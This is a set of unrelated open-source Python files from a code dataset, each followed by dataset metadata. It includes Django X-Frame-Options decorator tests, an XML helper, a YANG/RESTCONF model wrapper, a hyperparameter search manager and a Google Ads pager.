self.assertEqual(r['X-Frame-Options'], 'DENY')
def test_sameorigin_decorator(self):
"""
Ensures @xframe_options_sameorigin properly sets the X-Frame-Options
header.
"""
@xframe_options_sameorigin
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
self.assertEqual(r['X-Frame-Options'], 'SAMEORIGIN')
def test_exempt_decorator(self):
"""
Ensures @xframe_options_exempt properly instructs the
XFrameOptionsMiddleware to NOT set the header.
"""
@xframe_options_exempt
def a_view(request):
return HttpResponse()
req = HttpRequest()
resp = a_view(req)
self.assertIsNone(resp.get('X-Frame-Options', None))
self.assertTrue(resp.xframe_options_exempt)
# Since the real purpose of the exempt decorator is to suppress
# the middleware's functionality, let's make sure it actually works...
r = XFrameOptionsMiddleware().process_response(req, resp)
self.assertIsNone(r.get('X-Frame-Options', None))
class NeverCacheDecoratorTest(TestCase):
def test_never_cache_decorator(self):
@never_cache
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
self.assertEqual(
set(r['Cache-Control'].split(', ')),
{'max-age=0', 'no-cache', 'no-store', 'must-revalidate', 'private'},
)
| bsd-3-clause | -4,067,068,310,913,353,700 | 29.993776 | 89 | 0.592141 | false |
jperla/webify | webify/templates/helpers/xml.py | 1 | 1061 |
__no_content = object()
def node(element_name, content=__no_content, attributes={}):
attrs_string = _attrs_string(attributes)
if content == __no_content:
return node_block(element_name, attributes)
else:
return node_inline(element_name, content, attributes)
def _attrs_string(attributes):
attrs = u' '.join(['%s="%s"' % (k,v) for k,v in attributes.iteritems()])
attrs_string = (u' ' + attrs) if len(attrs) > 0 else u''
return attrs_string
def node_inline(element_name, content, attributes={}):
attrs_string = _attrs_string(attributes)
if content == u'':
return u'<%s%s />' % (element_name, attrs_string)
else:
return u'<%s%s>%s</%s>\n' % (element_name, attrs_string, content, element_name)
def node_block(element_name, attributes={}):
attrs_string = _attrs_string(attributes)
return u'<%s%s>\n' % (element_name, attrs_string), u'</%s>\n' % element_name
def cdata(content):
return u'<![CDATA[>%s\n]]>' % content
def cdata_block():
return u'<![CDATA[>', u'\n]]>'
| mit | -1,484,670,680,213,760,300 | 33.225806 | 87 | 0.613572 | false |
cboling/onos-restconf-providers | tools/mockDevice/yangModel.py | 1 | 5799 | #
# Copyright 2015-present Boling Consulting Solutions, bcsw.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from yinFile import YINFile
import os
class YangModel:
"""
This class wraps the yang model and helps to hide some of the ugly details needed to
get this code-generated RESTCONF server working.
"""
_extmethods = None
_yang_class = None
_yin = None
def __init__(self, yin_path, yin_file, model_dir, verbose=False):
"""
YANG model initializer
:param: yin_path (string) Directory path to the location of the YIN file (and python file)
:param: yin_file (string) Name of the YIN file generated by 'pyang'. The name of the code-generated
python file is extracted from the YIN file (module name).
:param: model_dir (string) Directory name of where the model is.
Used in constructing the import statement.
:param: verbose (integer) Flag indicating if verbose output is to be presented
"""
self._yin = YINFile(os.path.join(yin_path, yin_file), verbose)
self._verbose = verbose
# Import the model
self._import_models(model_dir)
def __str__(self):
return 'YangModel: %s' % self.name
@property
def name(self):
"""
Get the module name.
@:returns: (string) YANG Model name
"""
return self._yin.module_name
@property
def package_name(self):
"""
Get the code-generated package name. The pyangbind package will replace hypens and
spaces with underscores.
@:returns: (string) Python code-generated module name
"""
return self.name.replace('-', '_').replace(' ', '_')
def _import_models(self, model_dir):
"""
This method is responsible for accessing the code-generated class and building up
a model that can be used to provide a simple RESTCONF server implementation of the
model.
:param: model_dir (string) Base directory name of where the model is.
"""
package = model_dir
module = self.package_name
_class = self.package_name
try:
if self._verbose > 0:
print 'Dynamic import -> from %s.%s import %s' % (package, module, _class)
yang_module = __import__('%s.%s' % (package, module), fromlist=[_class])
yang_class = getattr(yang_module, _class)
if self._verbose > 0:
print 'YANG class initially imported: %s' % yang_class
# Construct the extmethods for all appropriate nodes in the class and then
# reconstruct the class if needed with these method
self._extmethods = self._yin.get_extmethods(yang_class().get())
# Now reconstruct the class and pass in these methods
if self._extmethods is not None and len(self._extmethods) > 0:
self._yang_class = getattr(yang_module, _class)(extmethods=self._extmethods)
else:
self._yang_class = yang_class
except ImportError:
print 'Import Error while attempting to import class %s from %s.%s' % (_class, package, module)
# Instantiate the models the first time so we can generate all the paths within
# them so we can create extension methods that provide for RESTCONF required
# methods
###########################################################################
def _get_extmethods(self, element, path_base=''):
"""
A recursive function to convert a yang model into a extmethods dictionary
:param element: (list of YANGDynClass) Child elements of a the model instance
:param path_base: (dict) Existing dictionary of elements
:return: (dict) A Pyangbind compatible extmethods dictionary
"""
extmethods = {}
if element is None:
return extmethods
if isinstance(element, dict):
# print '%s is a dictionary of length %d' % (element, len(element))
# yang_name = getattr(element, "yang_name") if hasattr(element, "yang_name") else None
# is_container = hasattr(element, "get")
for key, value in element.items():
path = path_base + '/' + key
config = True
yang_name = getattr(value, "yang_name") if hasattr(element, "yang_name") else None
is_container = hasattr(value, "get")
try:
if value._is_leaf: # Protected, but I really need to know
config = value.flags.writeable
except AttributeError:
pass # Was another dictionary item or did not have a writeable flag
# Add this to our path
extmethods[path] = config
extmethods.update(self._get_extmethods(value, path_base=path))
return extmethods
def _fix_extmethods(self, extmethods):
"""
Walk through the methods and fix up any parents that have no children that
are writeable.
"""
# TODO: Need to implement
return extmethods
| apache-2.0 | 7,545,779,531,491,814,000 | 36.173077 | 108 | 0.59562 | false |
google-research/google-research | tft/libs/hyperparam_opt.py | 1 | 13875 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Classes used for hyperparameter optimisation.
Two main classes exist:
1) HyperparamOptManager used for optimisation on a single machine/GPU.
2) DistributedHyperparamOptManager for multiple GPUs on different machines.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import libs.utils as utils
import numpy as np
import pandas as pd
Deque = collections.deque
class HyperparamOptManager:
"""Manages hyperparameter optimisation using random search for a single GPU.
Attributes:
param_ranges: Discrete hyperparameter range for random search.
results: Dataframe of validation results.
fixed_params: Fixed model parameters per experiment.
saved_params: Dataframe of parameters trained.
best_score: Minimum validation loss observed thus far.
optimal_name: Key to best configuration.
hyperparam_folder: Where to save optimisation outputs.
"""
def __init__(self,
param_ranges,
fixed_params,
model_folder,
override_w_fixed_params=True):
"""Instantiates model.
Args:
param_ranges: Discrete hyperparameter range for random search.
fixed_params: Fixed model parameters per experiment.
model_folder: Folder to store optimisation artifacts.
override_w_fixed_params: Whether to override serialsed fixed model
parameters with new supplied values.
"""
self.param_ranges = param_ranges
self._max_tries = 1000
self.results = pd.DataFrame()
self.fixed_params = fixed_params
self.saved_params = pd.DataFrame()
self.best_score = np.Inf
self.optimal_name = ""
# Setup
# Create folder for saving if its not there
self.hyperparam_folder = model_folder
utils.create_folder_if_not_exist(self.hyperparam_folder)
self._override_w_fixed_params = override_w_fixed_params
def load_results(self):
"""Loads results from previous hyperparameter optimisation.
Returns:
A boolean indicating if previous results can be loaded.
"""
print("Loading results from", self.hyperparam_folder)
results_file = os.path.join(self.hyperparam_folder, "results.csv")
params_file = os.path.join(self.hyperparam_folder, "params.csv")
if os.path.exists(results_file) and os.path.exists(params_file):
self.results = pd.read_csv(results_file, index_col=0)
self.saved_params = pd.read_csv(params_file, index_col=0)
if not self.results.empty:
self.results.at["loss"] = self.results.loc["loss"].apply(float)
self.best_score = self.results.loc["loss"].min()
is_optimal = self.results.loc["loss"] == self.best_score
self.optimal_name = self.results.T[is_optimal].index[0]
return True
return False
def _get_params_from_name(self, name):
"""Returns previously saved parameters given a key."""
params = self.saved_params
selected_params = dict(params[name])
if self._override_w_fixed_params:
for k in self.fixed_params:
selected_params[k] = self.fixed_params[k]
return selected_params
def get_best_params(self):
"""Returns the optimal hyperparameters thus far."""
optimal_name = self.optimal_name
return self._get_params_from_name(optimal_name)
def clear(self):
"""Clears all previous results and saved parameters."""
shutil.rmtree(self.hyperparam_folder)
os.makedirs(self.hyperparam_folder)
self.results = pd.DataFrame()
self.saved_params = pd.DataFrame()
def _check_params(self, params):
"""Checks that parameter map is properly defined."""
valid_fields = list(self.param_ranges.keys()) + list(
self.fixed_params.keys())
invalid_fields = [k for k in params if k not in valid_fields]
missing_fields = [k for k in valid_fields if k not in params]
if invalid_fields:
raise ValueError("Invalid Fields Found {} - Valid ones are {}".format(
invalid_fields, valid_fields))
if missing_fields:
raise ValueError("Missing Fields Found {} - Valid ones are {}".format(
missing_fields, valid_fields))
def _get_name(self, params):
"""Returns a unique key for the supplied set of params."""
self._check_params(params)
fields = list(params.keys())
fields.sort()
return "_".join([str(params[k]) for k in fields])
def get_next_parameters(self, ranges_to_skip=None):
"""Returns the next set of parameters to optimise.
Args:
ranges_to_skip: Explicitly defines a set of keys to skip.
"""
if ranges_to_skip is None:
ranges_to_skip = set(self.results.index)
if not isinstance(self.param_ranges, dict):
raise ValueError("Only works for random search!")
param_range_keys = list(self.param_ranges.keys())
param_range_keys.sort()
def _get_next():
"""Returns next hyperparameter set per try."""
parameters = {
k: np.random.choice(self.param_ranges[k]) for k in param_range_keys
}
# Adds fixed params
for k in self.fixed_params:
parameters[k] = self.fixed_params[k]
return parameters
for _ in range(self._max_tries):
parameters = _get_next()
name = self._get_name(parameters)
if name not in ranges_to_skip:
return parameters
raise ValueError("Exceeded max number of hyperparameter searches!!")
def update_score(self, parameters, loss, model, info=""):
"""Updates the results from last optimisation run.
Args:
parameters: Hyperparameters used in optimisation.
loss: Validation loss obtained.
model: Model to serialised if required.
info: Any ancillary information to tag on to results.
Returns:
Boolean flag indicating if the model is the best seen so far.
"""
if np.isnan(loss):
loss = np.Inf
if not os.path.isdir(self.hyperparam_folder):
os.makedirs(self.hyperparam_folder)
name = self._get_name(parameters)
is_optimal = self.results.empty or loss < self.best_score
# save the first model
if is_optimal:
# Try saving first, before updating info
if model is not None:
print("Optimal model found, updating")
model.save(self.hyperparam_folder)
self.best_score = loss
self.optimal_name = name
self.results[name] = pd.Series({"loss": loss, "info": info})
self.saved_params[name] = pd.Series(parameters)
self.results.to_csv(os.path.join(self.hyperparam_folder, "results.csv"))
self.saved_params.to_csv(os.path.join(self.hyperparam_folder, "params.csv"))
return is_optimal
class DistributedHyperparamOptManager(HyperparamOptManager):
"""Manages distributed hyperparameter optimisation across many gpus."""
def __init__(self,
param_ranges,
fixed_params,
root_model_folder,
worker_number,
search_iterations=1000,
num_iterations_per_worker=5,
clear_serialised_params=False):
"""Instantiates optimisation manager.
This hyperparameter optimisation pre-generates #search_iterations
hyperparameter combinations and serialises them
at the start. At runtime, each worker goes through their own set of
parameter ranges. The pregeneration
allows for multiple workers to run in parallel on different machines without
resulting in parameter overlaps.
Args:
param_ranges: Discrete hyperparameter range for random search.
fixed_params: Fixed model parameters per experiment.
root_model_folder: Folder to store optimisation artifacts.
worker_number: Worker index definining which set of hyperparameters to
test.
search_iterations: Maximum numer of random search iterations.
num_iterations_per_worker: How many iterations are handled per worker.
clear_serialised_params: Whether to regenerate hyperparameter
combinations.
"""
max_workers = int(np.ceil(search_iterations / num_iterations_per_worker))
# Sanity checks
if worker_number > max_workers:
raise ValueError(
"Worker number ({}) cannot be larger than the total number of workers!"
.format(max_workers))
if worker_number > search_iterations:
raise ValueError(
"Worker number ({}) cannot be larger than the max search iterations ({})!"
.format(worker_number, search_iterations))
print("*** Creating hyperparameter manager for worker {} ***".format(
worker_number))
hyperparam_folder = os.path.join(root_model_folder, str(worker_number))
super().__init__(
param_ranges,
fixed_params,
hyperparam_folder,
override_w_fixed_params=True)
serialised_ranges_folder = os.path.join(root_model_folder, "hyperparams")
if clear_serialised_params:
print("Regenerating hyperparameter list")
if os.path.exists(serialised_ranges_folder):
shutil.rmtree(serialised_ranges_folder)
utils.create_folder_if_not_exist(serialised_ranges_folder)
self.serialised_ranges_path = os.path.join(
serialised_ranges_folder, "ranges_{}.csv".format(search_iterations))
self.hyperparam_folder = hyperparam_folder # override
self.worker_num = worker_number
self.total_search_iterations = search_iterations
self.num_iterations_per_worker = num_iterations_per_worker
self.global_hyperparam_df = self.load_serialised_hyperparam_df()
self.worker_search_queue = self._get_worker_search_queue()
@property
def optimisation_completed(self):
return False if self.worker_search_queue else True
def get_next_parameters(self):
"""Returns next dictionary of hyperparameters to optimise."""
param_name = self.worker_search_queue.pop()
params = self.global_hyperparam_df.loc[param_name, :].to_dict()
# Always override!
for k in self.fixed_params:
print("Overriding saved {}: {}".format(k, self.fixed_params[k]))
params[k] = self.fixed_params[k]
return params
def load_serialised_hyperparam_df(self):
"""Loads serialsed hyperparameter ranges from file.
Returns:
DataFrame containing hyperparameter combinations.
"""
print("Loading params for {} search iterations form {}".format(
self.total_search_iterations, self.serialised_ranges_path))
if os.path.exists(self.serialised_ranges_folder):
df = pd.read_csv(self.serialised_ranges_path, index_col=0)
else:
print("Unable to load - regenerating serach ranges instead")
df = self.update_serialised_hyperparam_df()
return df
def update_serialised_hyperparam_df(self):
"""Regenerates hyperparameter combinations and saves to file.
Returns:
DataFrame containing hyperparameter combinations.
"""
search_df = self._generate_full_hyperparam_df()
print("Serialising params for {} search iterations to {}".format(
self.total_search_iterations, self.serialised_ranges_path))
search_df.to_csv(self.serialised_ranges_path)
return search_df
def _generate_full_hyperparam_df(self):
"""Generates actual hyperparameter combinations.
Returns:
DataFrame containing hyperparameter combinations.
"""
np.random.seed(131) # for reproducibility of hyperparam list
name_list = []
param_list = []
for _ in range(self.total_search_iterations):
params = super().get_next_parameters(name_list)
name = self._get_name(params)
name_list.append(name)
param_list.append(params)
full_search_df = pd.DataFrame(param_list, index=name_list)
return full_search_df
def clear(self): # reset when cleared
"""Clears results for hyperparameter manager and resets."""
super().clear()
self.worker_search_queue = self._get_worker_search_queue()
def load_results(self):
"""Load results from file and queue parameter combinations to try.
Returns:
Boolean indicating if results were successfully loaded.
"""
success = super().load_results()
if success:
self.worker_search_queue = self._get_worker_search_queue()
return success
def _get_worker_search_queue(self):
"""Generates the queue of param combinations for current worker.
Returns:
Queue of hyperparameter combinations outstanding.
"""
global_df = self.assign_worker_numbers(self.global_hyperparam_df)
worker_df = global_df[global_df["worker"] == self.worker_num]
left_overs = [s for s in worker_df.index if s not in self.results.columns]
return Deque(left_overs)
def assign_worker_numbers(self, df):
"""Updates parameter combinations with the index of the worker used.
Args:
df: DataFrame of parameter combinations.
Returns:
Updated DataFrame with worker number.
"""
output = df.copy()
n = self.total_search_iterations
batch_size = self.num_iterations_per_worker
max_worker_num = int(np.ceil(n / batch_size))
worker_idx = np.concatenate([
np.tile(i + 1, self.num_iterations_per_worker)
for i in range(max_worker_num)
])
output["worker"] = worker_idx[:len(output)]
return output
| apache-2.0 | 4,648,941,923,380,568,000 | 30.678082 | 84 | 0.683099 | false |
googleads/google-ads-python | google/ads/googleads/v8/services/services/batch_job_service/pagers.py | 1 | 3313 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, Callable, Iterable, Sequence, Tuple
from google.ads.googleads.v8.services.types import batch_job_service
class ListBatchJobResultsPager:
"""A pager for iterating through ``list_batch_job_results`` requests.
This class thinly wraps an initial
:class:`google.ads.googleads.v8.services.types.ListBatchJobResultsResponse` object, and
provides an ``__iter__`` method to iterate through its
``results`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListBatchJobResults`` requests and continue to iterate
through the ``results`` field on the
corresponding responses.
All the usual :class:`google.ads.googleads.v8.services.types.ListBatchJobResultsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., batch_job_service.ListBatchJobResultsResponse],
request: batch_job_service.ListBatchJobResultsRequest,
response: batch_job_service.ListBatchJobResultsResponse,
metadata: Sequence[Tuple[str, str]] = (),
):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (:class:`google.ads.googleads.v8.services.types.ListBatchJobResultsRequest`):
The initial request object.
response (:class:`google.ads.googleads.v8.services.types.ListBatchJobResultsResponse`):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = batch_job_service.ListBatchJobResultsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[batch_job_service.ListBatchJobResultsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(
self._request, metadata=self._metadata
)
yield self._response
def __iter__(self) -> Iterable[batch_job_service.BatchJobResult]:
for page in self.pages:
yield from page.results
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
| apache-2.0 | 1,347,235,011,634,477,000 | 39.901235 | 99 | 0.674011 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.